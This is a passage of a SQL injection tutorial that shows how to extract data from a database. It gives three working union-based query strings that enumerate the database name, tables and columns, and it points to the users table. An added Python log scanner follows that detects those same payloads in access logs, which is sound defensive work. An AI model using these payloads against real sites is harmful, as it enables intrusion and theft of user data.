SQL Injection: Extracting Data

Freedom Computing Alliance


1: Definition

2: Targeting and Testing

3: Accessing the Database

4: Extracting Data

At this point you can start pulling useful data from the server. First, find the name of the current database using the following query string format:

id=-123 union select 1,2,concat(database()),4,5,6--

Use the following query string format to display the names of all the tables in the current database:

id=-123 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()--

Note the order of these tables, as it will help you interpret the results of the next query.

Now change the query string to ask for all the column names from all the tables:

id=-123 union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_schema=database()--

You can now take your pick of data; the most useful data is probably in the “users” table, or something similarly named. Looking at the column names you may see various ID, username and…
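Seen from the defender's side, the three query strings above leave distinctive markers in web server access logs. The following Python scanner is an added example, not part of the original post: it percent-decodes each query parameter and reports which of those markers it contains. The log lines, paths and IP addresses are constructed samples, and the marker names are labels chosen for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Markers taken from the three query strings shown above (names are this example's own).
MARKERS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_tables": re.compile(r"\binformation_schema\s*\.\s*tables\b"),
    "schema_columns": re.compile(r"\binformation_schema\s*\.\s*columns\b"),
    "database_fn": re.compile(r"\bdatabase\s*\(\s*\)"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
}
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return (parameter, [marker names]) pairs for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    hits = []
    # parse_qsl percent-decodes each value and turns '+' into a space.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        norm = " ".join(value.lower().split())  # lowercase, collapse whitespace
        found = [k for k, rx in MARKERS.items() if rx.search(norm)]
        if found:
            hits.append((name, found))
    return hits

def scan(lines):
    """Map 1-based line number -> findings, for lines with at least one hit."""
    return {i: h for i, l in enumerate(lines, 1) if (h := scan_line(l))}

# Constructed sample log lines; 203.0.113.0/24 is a documentation range.
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=123 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=-123%20union%20select%201,2,concat(database()),4,5,6-- HTTP/1.1" 200 498',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=-123+union+select+1,2,group_concat(table_name),4,5,6+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 733',
    '203.0.113.7 - - [01/Jan/2024:10:00:14 +0000] "GET /item.php?id=-123%20UNION%20SELECT%201,2,GROUP_CONCAT(column_name),4,5,6%20FROM%20information_schema.columns%20WHERE%20table_schema=DATABASE()-- HTTP/1.1" 200 1904',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=union+station+select+seating HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE).items():
        for param, names in findings:
            print(f"line {lineno}: parameter {param!r} matches {', '.join(names)}")
```

A hit on `schema_tables` or `schema_columns` in a request parameter is a strong signal, because ordinary application traffic has no reason to name `information_schema`.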
